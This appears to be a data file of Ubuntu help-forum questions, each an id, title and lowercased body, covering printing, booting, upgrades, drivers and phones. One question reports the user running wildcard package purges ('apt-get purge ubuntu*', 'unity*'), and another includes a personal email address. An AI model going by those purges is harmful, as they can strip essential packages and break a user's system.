360497	printer shared via ubuntu stops being visible after restart of server machine or client machine	i have setup cups and samba server on linux machine which has a hp deskjet 6122 printer attached via usb . i have also managed to install this shared printer on other windows 7 machine via lan network . i have gone through many instructions . these are just few of them : https : //help.ubuntu.com/10.04/serverguide/cups.html https : //help.ubuntu.com/community/networkprintingwithubuntu what is a cups server and how to share a printer over a network sharing printer with cups the reason i keep doing the same thing with different instructions is because the whole setup works fine until a restart of the windows machine ( client ) or linux machine ( server with attached printer ) . after the restart of any machine , sending a print request from the windows machine results in print task being visibile in print queue on windows but not visible in the print queue on linux . obviously , this means that documents are not being printed from windows machine . this problem drives me mad for weeks . the only way to print from windows is to repeat procedure of installing the network printer . and it works ... . till restart of any machine . note that i do not have to setup anything on linux again to make windows- > linux printing work . i am begging for advice .
360499	/etc/pm/power.d scripts not executing after update to 13.10	i recently updated to ubuntu 13.10 and realized that scripts in /etc/pm/power.d do not fire anymore . has something changed in the way pm-utils work ? is there any way to make it work . i have a script which automatically changes the brightness on my monitor if the power cable is plugged out and i would like to be able to use it again . update i realized that the main reason why the scripts are n't executing automatically is because the upowerd is not running . if i run upower -- monitor , the scripts start to execute whenever i connect or disconnect the charger . the man upowerd says the following : upowerd provides the org.freedesktop.upower service on the system message bus . users or administrators should never need to start this daemon as it will be automatically started by dbus-daemon ( 1 ) whenever an application calls into the org.freedesktop.upower service . why does n't the upowerd start automatically on boot ?
360500	are the flashing instructions on the ubuntu website safe for nexus 10 ?	i realize that the site says only the nexus 4 and samsung galaxy nexus are supported , but i am wondering if it is `` safe '' to follow these same directions on a nexus 10 ? http : //www.ubuntu.com/phone/install or do i still have to follow the instructions on this site ? https : //wiki.ubuntu.com/touch/install tia
360501	how to find the size of all partitions	how can i find size the of all partitions in ubuntu with a command that saves to name.txt ?
360506	nvidia96 broke the loginscreen - how to remove or fix ?	a friend brought her pc to repair xp . as the hd was dead i reinstalled and reserved space for ubuntu . once 12.04.3 x86 ( for the amd 1ghz not x64 cpu ) was installed i got `` out of range '' on screen which prevented to select the boot entry , what i resolved by forcing windows as default os in grub , then later 1024*768 also in grub , but after that i found the display and everything very slow compared to xp , so i thought it was again because of a video problem and i read there are specific drivers for this gpu ( nvidia 4200 gpu nv25 according to lspci ) . the additional drivers applet in system settings did n't find anything , so i installed nvidia-96 from the software center , but a bug happened during installation . in the end nvidia96 was shown `` installed '' , so i re-ran additional drivers . now it showed nvidia96 available but fails to activate it . now on boot the screen switches to tty1 . i tried to boot to safe video in recovery mode but this run in a loop , back to the options . on tty7 i can see `` starting load fallback graphics devices [ fail ] '' . please how to have this ubuntu boot option useful and working as smooth as the xp one if possible ? thank you . [ edit ] : i remember when i installed nvidia-96 i got a message stating this will disable further new features of `` the ubuntu desktop '' . i clicked `` install anyway '' . it was very long and apport* bug popped-up during the process , and i saw a `` removing '' message in software center before the process ended with a green backgrounded circle `` installed '' check-mark . *apport said it would better to ask support instead of submitting a bug . i clicked `` i do n't know what to do '' .
360508	trying to erase a dvd+rw in ubuntu 11.10	i burned a video onto a dvd+rw windows vista several years ago . i now want to erase the dvd using ubuntu 11.10 and install ubuntu 12.4 studio onto this disc . i tried to blank the disc , but it did n't work . and now i ca n't get windows 7 to read it as well as ubuntu 11.10 . how do i erase this disc for reuse ?
360510	how do i reset my ubuntu 12.10 password ?	so my sister gave me this old laptop that has ubuntu 12.10 . the problem is that she has a username administrator password , but she forgot it . i 've tried using grub and launching recovery mode and using the root shell prompt . and i type the `` passwd username '' command , and it tells me to type the new unix password , but when i try to type a new password it 's like my keyboard does n't even work . it types nothing . what 's the problem ? why does my keyboard not type anything when i try to reset the unix password ? it always works perfectly fine . i 'm grateful for any help , thank you .
360512	package missing in upgrade	the upgrade icon lit up on my xubuntu 13.04 laptop this evening , with 11 packages to upgrade . fine , except one of them , xserver-xephyr_1.13.3-0ubuntu6.2_i386.deb , does n't exist in the repos . is there a place to report this ?
360515	keyboard not functioning during reboot , can not access boot menu	im running ubuntu 13.04 . i want to access my boot menu consists of just holding down the esc key during reboot . problem is ... ..my keyboard doesnt activate until ubuntu is almost booted completely . in other words i can push any key i want and my computer doesnt know it because the keyboard isnt on . i put in a boot disk and all it does produce a another keyboard request ... '' hit any key to run from cd '' . tulsahawk823 @ aol.com
360520	lubuntu : how do i autostart xfce4 power manager ?	i just upgraded my 64 bit lubuntu to 13.10 on my netbook today . after the upgrade , i simply ca n't autostart the xfce4 power manager . i tried to add from the desktop session settings , i tried to copy the power manager.desktop file to ~/.config/autostart folder . everything looks fine . then i logout , log back in and the darn power manager just wo n't start automatically . it only starts when i double click the icon , or if i start it from the terminal .
360523	connecting a nexus 7 to ubuntu	what is the best way to connect a nexus 7 by usb and transfer files to/from ubuntu ? i had a bit of a fiddle with mtpfs but did n't get very far as it seems to hang when i connect the device . i have ubuntu 12.4 and 3.8 kernel . i see there is this previous question , but there was no answer : nexus 7 usb problems
360526	screen brightness and wireless problems on kubuntu thinkpad after upgrading to 13.10	upon upgrading from 13.04 to 13.10 , i am no longer able to change the brightness via kde system settings or the battery monitor widget . upon editing my /etc/default/grub to grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' i am able to modify brightness via keyboard controls but not via system settings or the battery monitor widget . brightness appears to be at 100 % on startup . /sys/class/backlight contains thinkpad_screen and intel_backlight . xbacklight does not change when given commands such as xbacklight -set 50 . additionally , i periodically get the error notification : wireless interface wlan0 failed to activate - authorization supplicant timed out . i am using a lenovo thinkpad t430s with nvidia optimus graphics and an intel wireless card . all settings worked fine before the upgrade .
360528	i just wanted to connect my phone to pc	i just wanted to connect my phone samsung s3 ubuntu pc . i found a tutorial how to transfer files from linux operating system to an android on sofpedia ( http : //news.softpedia.com/news/how-to-transfer-files-from-ubuntu-to-android-341722.shtml ) after the reboot i found ... ... [ 1 ] : http : //i.stack.imgur.com/tgein.png some time ago there was talk about ubuntu for android , and now can not connect a phone to pc to transfer 3 photos besides that starts with a lot of errors ! with each distribution that appears 'm disappointed question ! how can i connect android phone to pc ubuntu ?
360529	how do i compile lbflow 1.1 ?	after using `` sh ./configure '' command , i encountered another error during lbflow package installation ( a scientific one ) . the sequence of operations is here with error : ./configure -- disable-gts sudo make [ sudo ] password for alireza : make all-recursive make [ 1 ] : entering directory `/home/alireza/lbflow-1.1' making all in src make [ 2 ] : entering directory `/home/alireza/lbflow-1.1/src' source='lbflow.cpp ' object='lbflow-lbflow.o ' libtool=no \ depdir=.deps depmode=none /bin/bash ../depcomp \ g++ -dhave_config_h -i . -i . -i.. -c -o lbflow-lbflow.o `test -f 'lbflow.cpp ' || echo './'`lbflow.cpp **../depcomp : line 432 : exec : g++ : not found** **make [ 2 ] : *** [ lbflow-lbflow.o ] error 127 make [ 2 ] : leaving directory `/home/alireza/lbflow-1.1/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/alireza/lbflow-1.1' make : *** [ all ] error 2** do you have any idea to troubleshoot this problem ? ( and please notice that i have installed both g++ and gcc . it says g++ : not found , but i have installed g++ from ubuntu software center ! )
360531	black screen after logging in ubuntu vm	i dual-boot my laptop and use windows 7 pro primarily and have ubuntu 13.10 . i 've created a raw disk vmdk of the entire drive . i also use the latest virtualbox . i would like to start ubuntu in virtualbox but have issues . it will boot to the log in screen . i log in , but the screen goes black . i have not been able to find a solution so far and hope someone might have an idea to try . thanks
360532	how do i set a password for individual folders ?	i 'm trying to find out how to set up passwords for individual folders . my computer has one user login so we all know the password to the computer . i want to be able to click a folder and it request a password to enter . hopefully without needing to download aplications or subscribe to things etc . all i want is a simple password protected box to pop up when i click a folder i have selected to protect . this would mean my daughter would be un able to access my important files and accidentally delete or change anything . if anyone can provide some simple advice , that does n't involve having my passwords or files backed up into an application that needs downloading , and has a straight forward answer to a simple request , it would be much appreciated .
360533	ubuntu not installing on toshiba satellite	i recently bought a toshiba satellite s70 and customized it to have nvidia geforce graphics card . i have ubuntu 12.04 lts on my old laptop and created a 13.04 and 13.10 install usbs . i jump through the hoops to get to the usb boot , and am able to get to the grub menu . from there , when i try either the `` try ubuntu without installing '' or the `` install ubuntu '' option , the screen seems to shut off , and nothing happens . if i look at the install code thing , it says quiet splash and i 've tried nomodesetbut all that does is load a shell . basically startx fails , and i just get the i/o stream . i want to install it side by side windows 8 , any solutions ?
360537	how to create scripts that create another scripts	i am writing an script that needs to generate another script that will be used to shutdown an appserver ... this is how my code looks like : echo `` step 8 : create stop script '' stopscriptcontent= '' echo \ '' stoping glassfish please wait ... \ '' \n cd glassfish4/bin\n chmod +x asadmin\n ./asadmin stop-domain\n # in order to work it is required that the original folder of glassfish do n't contain already any # project , otherwise , there will be a conflict\n '' $ { stopscriptcontent } > stop.sh chmod +x stop.sh but it is not being created correctly , this is how the output stop.sh looks like : '' stoping glassfish please wait ... '' \n cd glassfish4/bin\n chmod +x asadmin\n ./asadmin stop-domain\n # in order to work it is required that the original folder of glassfish do n't contain already any # project , otherwise , there will be a conflict\n as you see , lots of things are wrong : there is no echo command is taking the \n literaly so there is no new line my doubts are : what is the correct way of making an .sh script create another .sh script . what do you thing i am doing wrong ?
360538	laptop wo n't get to grub after meddling with kernels	i recently found out i had different kernel versions installed , so i removed the 3.9 kernel as proposed in this answer on my earlier question . after that , i updated my grub , but my laptop wo n't seem to reach it . output of aptitude search linux | grep ^i : i libselinux1 - selinux runtime shared libraries i libselinux1 : i386 - selinux runtime shared libraries i linux-firmware - firmware for linux kernel drivers i a linux-headers-3.11.0-12 - header files related to linux kernel versi i a linux-headers-3.11.0-12-generic - linux kernel headers for version 3.11.0 on i linux-headers-3.11.4-031104 - header files related to linux kernel versi i linux-headers-3.11.4-031104-gen - linux kernel headers for version 3.11.4 on i linux-headers-generic - generic linux kernel headers i linux-libc-dev - linux kernel headers for development i linux-sound-base - base package for alsa and oss sound system i pptp-linux - point-to-point tunneling protocol ( pptp ) c i syslinux - collection of boot loaders i syslinux-common - collection of boot loaders ( common files ) i syslinux-legacy - bootloader for linux/i386 using ms-dos flo i util-linux - miscellaneous system utilities how do i proceed to fix this error from my live cd ?
360539	ubuntu server 13.04.3 does n't boot w/ efi	i 'm was actually trying to install debian wheezy ( which failed horribly ) , then tried ubuntu server 13.04 and got the exact same problems as w/ debian : after installing , the system does n't show any boot-selection and tells me `` missing operating system '' . my setup is pretty simple : /dev/sdc - 1tb hdd ( + 3 other ntfs hdd ) /dev/sdc1 - efi , 100mib , bootable /dev/sdc4 - ext4 , 65gib , ubuntu/debian ( sdc2 & 3 are ntfs w/ data . sorta lacking sata-ports , therefore no os-only hdd/ssd ) grub seems to be installed on /dev/sdc4 , /dev/sdc1 only contains a `` efi '' -folder . not sure if thats correct . i used unetbootin on os x to make an 8gb usb-drive bootable and used the standard amd64-iso , running a perl-script wich eradicates a couple of naming-errors ( different story ) . using this tutorial and actually disabling uefi and using legacy only dind't work either , the usb drive dind't even bother to boot . i 'm pretty clueless here . i 'd just like to install and use either debian or ubuntu server !
360543	convert from efi to bios boot	i have a samsung notebook np900x4c with an luks encrypted installation of linux mint 15 on it . the system is booting in uefi mode . the problem is that the samsung-notebook kernel module is disabled in uefi mode and due to that i am missing features like the keyboard backlight . is it possible to modify the current installtion so it can boot in bios mode ? is this correct that the basic steps would be converting the disk from gpt to mbr and installing grub from a live cd ? would this be possible with a luks partition ?
360545	kicked back to log in screen immediately after log in	i am running ubuntu 12.04 lts and whenever i try to log in using my main account , it kicks me back to log in screen . my other accounts do n't do this however . i also tried to read .xsessions-errors using cat but it would output gpg-agent [ 7156 ] : failed to run the command : no such file or directory i can also log in my main account with tty . how can i fix it so i can log into my main account again ?
360547	can i run `apt-get purge -- auto-remove` ?	is apt-get purge -- auto-remove packagename a valid command ? or , does it have to be apt-get remove -- purge -- auto-remove packagename ? the ubuntu manpage for apt-get ( http : //manpages.ubuntu.com/manpages/precise/man8/apt-get.8.html ) only mentions using the -- auto-remove option `` if the command is either install or remove ... '' , so i was wondering if it could also be used with the purge command , since that is just a shortcut for the remove command with the -- purge option . thank you .
360549	jupiter in ubuntu 13.10 ( laptop overheating )	i was wondering if jupiter ( interface for display , power and device control ) will work in ubuntu 13.10 , because my laptop ( toshiba satellite c855d , amd a6-4400m with radeon hd graphics running ubuntu 13.04 x64 ) keeps overheating , i tried some other tools , like laptop-mode-tools or tlp , none of those work , not at all . jupiter was the only option and it 's supposedly discontinued , the version i 'm using is being maintained by jolicloud team , but they told me they 're not sure if it will work with 13.10 ... if it does n't work , i 'm definitely not upgrading , since overheating is a major issue for me ... thanks in advance !
360552	how to install drivers for e-mu 0404 pci	i need help installing drivers for a e-mu 0404 pci .
360553	mouse pointer blinking	after installing ubuntu 13.10 mouse is blinking and sometimes it blinks so fast that i ca n't see where it is , especially on web pages . it also happens even if i do n't work anything on computer . during setup of installation i pointed /home to previous 13.04 ubuntu , maybe some settings are obsolete . what could be problem here ? i have nvidia 525m graphic card .
360554	how do i sync google contacts ?	i have flashed a phone with ubuntu for phones and would like to get my contacts from google onto the device . how do i do that ?
360555	playonlinux update to 4.2.1 problem	i have a problem i install playonlinux from the ubuntu software center and there is a new update : 4.2.1 ; i do n't know how to get this new update , im new to ubuntu and i do n't know why to get an update has to be this difficult . please help i saw that there is office 2010 and i will like to get it ...
360560	404 errors in ubuntu 13.10	just installed ubuntu 13.10 i did apt-update in terminal and sow this err http : //ppa.launchpad.net /ubuntu/saucy amd64 packages 404 not found err http : //ppa.launchpad.net /ubuntu/main amd64 packages 404 not found err http : //ppa.launchpad.net /ubuntu/saucy i386 packages 404 not found err http : //ppa.laun w : failed to fetch http : //ppa.launchpad.net/ubuntu-wine/ppa/dists//ubuntu/saucy/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-wine/ppa/dists//ubuntu/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-wine/ppa/dists//ubuntu/saucy/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-wine/ppa/dists//ubuntu/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i do not understand why am i getting this errors wine 's ppa shows that 13.10 is available and the above i even do not know what is it ? ? any help how to fix this grep -rn `` ubuntu-wine '' /etc/apt/sources* /etc/apt/sources.list.d/ubuntu-wine-ppa_-saucy.list:1 : deb http : //ppa.launchpad.net/ubuntu-wine/ppa /ubuntu saucy main /etc/apt/sources.list.d/ubuntu-wine-ppa_-saucy.list:2 : # deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa /ubuntu saucy main
360569	strange behavior on gnome after update on from 13.04 to 13.10	i made an automatic update on my ubuntu 13.10 ( from 13.04 ) system today . since this point of time , i am in really big trouble . i use a vnc server with gnome classic , after the update my gnome was gone . so i tried everything . checked the xstartup file of vncserver . right now i reached a point where i ca n't find the answer . the logfile says that gnome-session-fallback is missing , even directly after i installed it with apt-get ( tried it serveral times , installing , uninstalling and so on ) . i have no chance to use it as you can see in this terminal copy : root @ ip-xxx : ~/.vnc # apt-get install gnome-session-fallback reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : gnome-session-fallback 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/2,914 b of archives . after this operation , 247 kb of additional disk space will be used . selecting previously unselected package gnome-session-fallback . ( reading database ... 210977 files and directories currently installed . ) unpacking gnome-session-fallback ( from ... /gnome-session-fallback_1 % 3a3.6.2-0ubuntu15_all.deb ) ... setting up gnome-session-fallback ( 1:3.6.2-0ubuntu15 ) ... root @ ip-xxx : ~/.vnc # gnome-session-fallback the program 'gnome-session-fallback ' is currently not installed . you can install it by typing : apt-get install gnome-session-fallback if you have some idea , please give me a hint ... thank you !
360572	login loop after upgrade to 13.10	ubuntu has upgraded to 13.10 , but when i reboot i ca n't login , even when i try with the guest session . i am brought back to the login screen . i press ctrl+alt+f1 and login . then i remove the file ~/.xautohrity and reboot . after that it can login from lightdm but a new error appears : could not acquire name on session bus and when i reboot it ca n't login again . how can i fix this ? note that i have another desktop environment installed alongside unity .
360574	can i safely use suspend/hibernate during an upgrade ?	how will the upgrade progress react if i put the computer to sleep or hibernate it meanwhile upgrading ? right now it 's downloading packages , if i close the lid , take the computer to work and start it up and connect it to another wireless network , will the process be cancelled ? update : suspend and reconnect to a different network works fine during the package downloading process , but what about suspend meanwhile it installs packages or downloads the upgrade manager ?
360575	how can i force the phone screen to stay on	i flashed ubuntu for phones on a device and would like the display to stay on while i take photographs or video of the device . how can i do that ?
360577	dell power edge 1800 : wo n't install	i 'm trying to install 13.10 on a dell 1800 which gets to the the `` checking system '' portion of the install then it locks up . the keyboard then blinks at the caps lock and the scroll lock leds ; & i ca n't do a softboot . previously the system had windows small business server but that has since been completely wiped off and the raid formatted . thanks for any assistance . -pc
360583	is there wubi for ubuntu 13.10	is there a wubi installer for ubuntu 13.10 x64 ?
360585	nexus 4 ubuntu dual boot ?	not sure if this is already answered . i remember that the ubuntu edge claimed it could dual boot to normal android and ubuntu . is this still the case ? if i install on my nexus 4 will i have a choice to boot into either ubuntu or my already existing android os ?
360587	how do i remove the mouse battery indicator ?	i just upgraded from 13.04 to 13.10 and it seems there has been a new notification/status bar thingy ( sorry i 'm new to ubuntu ) for my mouse battery . it is in the place where it normally tells me how much laptop battery time/charge i have left . if i click on it , i can see the laptop battery status . i want to disable the info for the mouse and only display for my laptop battery . how do i do this ?
360589	problems with rt3290 card running using rt2800 driver on ubuntu 13.04	i have the rt3290 ralink wireless card run using the original rt2800 driver that came with the 13.04 system , on an asus f75v laptop . every time i reboot , rf-kill shows the wireless as hard-blocked . it can not be unblocked using neither rf-kill nor the supposed fn+f2 key combination , as various other posts suggest . after boot , in network manager , both the wifi and the airplane mode show up as `` off '' . i dug up a workaround on some obscure forum thread which i unfortunately was unable to dig up again ( this was awhile back ) : turn airplane mode on ( it stays on ) . hit the `` on '' button for the wireless ( it will go back to off very quickly ) . immediately send the computer into sleep mode . wake the machine up . wireless is working ( it 's a miracle ! ) . unfortunately , the effects do n't last past the next system boot . i am tired and annoyed by having to redo this `` trick '' over and over again ... so , i tried the official rt3290 driver ( following this post : how do i get a ralink rt3290 wireless card working ? ) . after reboot , the wireless was supposedly on ( not blocked as usual ) . however , no wireless networks were discovered ( and this is at the same location where the rt2800 driver worked previously without fail after the `` trick '' ) . i removed the rt2800 driver from the blacklist , and now i 'm back to the airplane-sleep trick workaround . any suggestions on how to fix it once and for all ? thanks ! update : i upgraded to kernel 3.11.5 and tried the rt3290sta driver again . unfortunately , same result ... wireless is on and unblocked , no networks visible . just to confirm that i have rt3290 , lspci -nnk | grep rt yields 03:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] 03:00.1 bluetooth [ 0d11 ] : ralink corp. rt3290 bluetooth [ 1814:3298 ] out of curiosity , i tried the ole ' airplane-mode trick . after emerging from suspend , the wireless worked ! what this shows is that either rt3290sta and rt2800pci suffer from the same problem , or , more likely , that the problem is not in the driver itself but elsewhere .
360590	ubuntu display - no existent	my hp pavillion dv5 1004nr worked great with ubuntu up until 11.04 . now , ever since unity desktop environment the display has been sporadic at best . i was told that the video driver bugs ( known and largely ignored ) were fixed for the ati raedon card in my laptop with 13.04 . so i installed it . 13.04 does n't even detect the display . boots to black screen every time now . is there ever going to be a fix for the amd architecture with ati raedon chipsets ? do the developers even care ? this has been an issue for years , and no sign of a fix in sight ... .
360592	can i set up a cron job on ubuntu phone	i 've been looking around , and ca n't find if ubuntu touch can run cron . so my question is : can it ? also does it have a standard set of bash utils installed ?
360593	after upgrade to 13.10 unable to update kernel	the upgrade went well . however i get an error when trying to update the kernel : e : linux-image-3.11.0-12-generic : subprocess installed post-installation script returned error exit status 2 e : linux-image-extra-3.11.0-12-generic : dependency problems - leaving unconfigured e : linux-image-generic : dependency problems - leaving unconfigured e : linux-generic : dependency problems - leaving unconfigured selecting previously unselected package linux-image-3.11.0-12-generic . ( reading database ... 570374 files and directories currently installed . ) unpacking linux-image-3.11.0-12-generic ( from ... /linux-image-3.11.0-12-generic_3.11.0-12.19_amd64.deb ) ... examining /etc/kernel/preinst.d/ run-parts : executing /etc/kernel/preinst.d/intel-microcode 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic done . selecting previously unselected package linux-image-extra-3.11.0-12-generic . unpacking linux-image-extra-3.11.0-12-generic ( from ... /linux-image-extra-3.11.0-12-generic_3.11.0-12.19_amd64.deb ) ... selecting previously unselected package linux-image-generic . unpacking linux-image-generic ( from ... /linux-image-generic_3.11.0.12.13_amd64.deb ) ... selecting previously unselected package linux-headers-3.11.0-12-generic . unpacking linux-headers-3.11.0-12-generic ( from ... /linux-headers-3.11.0-12-generic_3.11.0-12.19_amd64.deb ) ... selecting previously unselected package linux-headers-generic . unpacking linux-headers-generic ( from ... /linux-headers-generic_3.11.0.12.13_amd64.deb ) ... selecting previously unselected package linux-generic . unpacking linux-generic ( from ... /linux-generic_3.11.0.12.13_amd64.deb ) ... setting up linux-image-3.11.0-12-generic ( 3.11.0-12.19 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : generating /boot/initrd.img-3.11.0-12-generic /usr/share/initramfs-tools/hooks/intel_microcode : 136 : /usr/share/initramfs-tools/hooks/intel_microcode : prepend_earlyinitramfs : not found e : intel-microcode : failed to prepend early firmware to initramfs w : intel-microcode : will try to use late initramfs update mode ... run-parts : executing /etc/kernel/postinst.d/pm-utils 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/update-nvidia 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : failed to exec /etc/kernel/postinst.d/update-nvidia : no such file or directory run-parts : /etc/kernel/postinst.d/update-nvidia exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postinst line 1010. dpkg : error processing linux-image-3.11.0-12-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports has already been reached dpkg : dependency problems prevent configuration of linux-image-extra-3.11.0-12-generic : linux-image-extra-3.11.0-12-generic depends on linux-image-3.11.0-12-generic ; however : package linux-image-3.11.0-12-generic is not configured yet . dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.11.0-12-generic ; however : package linux-image-3.11.0-12-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.11.0-12-generic ; however : package linux-image-extra-3.11.0-12-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-headers-3.11.0-12-generic ( 3.11.0-12.19 ) ... no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic setting up linux-headers-generic ( 3.11.0.12.13 ) ... dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.11.0.12.13 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-3.11.0-12-generic linux-image-extra-3.11.0-12-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up linux-image-3.11.0-12-generic ( 3.11.0-12.19 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : generating /boot/initrd.img-3.11.0-12-generic /usr/share/initramfs-tools/hooks/intel_microcode : 136 : /usr/share/initramfs-tools/hooks/intel_microcode : prepend_earlyinitramfs : not found e : intel-microcode : failed to prepend early firmware to initramfs w : intel-microcode : will try to use late initramfs update mode ... run-parts : executing /etc/kernel/postinst.d/pm-utils 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : executing /etc/kernel/postinst.d/update-nvidia 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic run-parts : failed to exec /etc/kernel/postinst.d/update-nvidia : no such file or directory run-parts : /etc/kernel/postinst.d/update-nvidia exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postinst line 1010. dpkg : error processing linux-image-3.11.0-12-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.11.0-12-generic : linux-image-extra-3.11.0-12-generic depends on linux-image-3.11.0-12-generic ; however : package linux-image-3.11.0-12-generic is not configured yet . dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.11.0-12-generic ; however : package linux-image-3.11.0-12-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.11.0-12-generic ; however : package linux-image-extra-3.11.0-12-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.11.0.12.13 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.11.0-12-generic linux-image-extra-3.11.0-12-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) pst007x @ pst007x-serval-professional : ~ $ i have tried : sudo dpkg -- configure -a in synaptic i get this error : e : linux-image-3.11.0-12-generic : subprocess installed post-installation script returned error exit status 2 e : linux-image-extra-3.11.0-12-generic : dependency problems - leaving unconfigured e : linux-image-generic : dependency problems - leaving unconfigured e : linux-generic : dependency problems - leaving unconfigured e : linux : dependency problems - leaving unconfigured e : linux-image : dependency problems - leaving unconfigured when i try to install using the .deb , i get unmet dependencies ... install through software center : any thoughts ? thanks 64bit edition ... edit : i have tried manually installing , i tried a few different kernels , all saying the same thing . i guess that there is a common dependency somewhere . any idea what would be common to all kernels ? i installed ubuntu 13.10 in a virtualbox to check dependencies . and all dependencies are ok. may be a bug , i have reported here : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1242210 i have installed a different kernel , but same issue : 3.11.6-031106-generic it appears not to be kernel specific , rather something missing in the packages . i have tried to manually install all dependencies , but still no joy.. wow , no-one has any ideas ? any help out there ? please : )
360595	will my installer crash if my screen goes to sleep	why does my ubuntu installer keep crashing , my computer has almost 1.5 gigs of memory and a 2.8 ghz processor . its a pretty fast computer . i have never had problems with it in the past . i dont know what else to try . i have continued to try reinstalling it over and over off of my usb thumb drive . will the installer crash if my screen goes to sleep ?
360598	13.10 - black borders , black terminal	i 've just upgraded to ubuntu 13.10 and i 'm seeing a strange behaviour . all windows i open have a black , boxy border , including popups , as you can see in the provided image . ( the black box in the bottom right is a terminal , which fails to display any text . however , i can enter commands and they execute . ) i followed the steps in this post : how do i reset my unity configuration ? to reset unity using the unity-tweak-tool . although helpful , that did not fix the issue . i 'm thinking this may be a graphics card driver issue . any help is much appreciated .
360603	ubuntu 12.4lts iphone 5 ca n't mount . test this computer loops endlessly	just what the subject said . wife just got a new iphone 5c ios 7 . i had pulled all the goodies off her old android ( now my new android ) and wanted to dump the pics and stuff back onto her new phone . alas , no joy . iphone prompts 'trust this compter ? ' i select to trust , and it just pops back up again , looping endlessly . ubuntu 12.04lts
360607	12.04 graphics on bootable usb : one works , one does n't , why ?	i have two bootable usb keys with ubuntu 12.04 . one works fine , one gives me a warning that `` the system is running in low graphic mode '' . when i try to `` install ubuntu '' from the menu , the graphics work at the proper resolution .
360608	system settings icons missing	is there any way to reset the system settings control panel page ? the control panel was fine , but the for no apparent reason , privacy , background and a host of other icons have vanished ... my system seems pretty messed up after the upgrade ... shutdown , reset , and logout from the menu no longer work either ... however , i can launch the privacy panel from the terminal : activity-log-manager and it runs ... so why is this , and others , now missing from the system setting control panel ? i have checked and : activity-log-manager-control-center is installed is there a config file i can check , or a setting in gconf where the list of icons are referenced ? i have run - in desperation - sudo apt-get purge unity* sudo apt-get purge ubuntu* sudo apt-get autoremove run gconf-cleaner and janitor then re-installed all packages still the same issue ... . ?
360610	how do i programmatically change user 's default appearance settings in kde ?	i have changed my window decoration + cursor theme in kubuntu for one user . i was wondering how i would make it the default window decoration + cursor theme for new users . i tried copying ~/.kde aswell as ~/.icons to /etc/skel but it did n't work . does anyone know what i 'm doing wrong ?
360613	how to remove cinnamon etc . and leave just ubuntu ?	i have cinnamon and many more . how can i remove them and leave just ubuntu ?
